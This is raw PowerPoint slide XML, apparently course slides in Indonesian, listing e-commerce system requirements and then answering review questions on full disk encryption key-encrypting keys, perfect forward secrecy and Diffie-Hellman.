            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>promosi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penawaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akuntansi-sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemesanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3701753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1. In an FDE product, what type of cipher is used for a key encrypting key?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Asymmetric cipher (public key cryptography).</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dirty="0"/>
              <a:t>Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Full Disk Encryption (FDE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>symmetric cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (disk encryption key) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>key encrypting key (KEK)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>asymmetric cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RSA, ECC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. True or False? Perfect Forward Secrecy (PFS) ensures that a compromise of a server’s private key will not also put copies of traffic sent to that server in the past at risk of decryption.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>True.</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dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>PFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>ephemeral session key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Diffie-Hellman.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>walaupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> private key server bocor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. Why does Diffie-Hellman underpin Perfect Forward Secrecy (PFS)?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Karena Diffie-Hellman (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECDHE – elliptic curve Diffie-Hellman ephemeral) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> ephemeral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TLS/SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Diffie-Hellman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> private key server di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
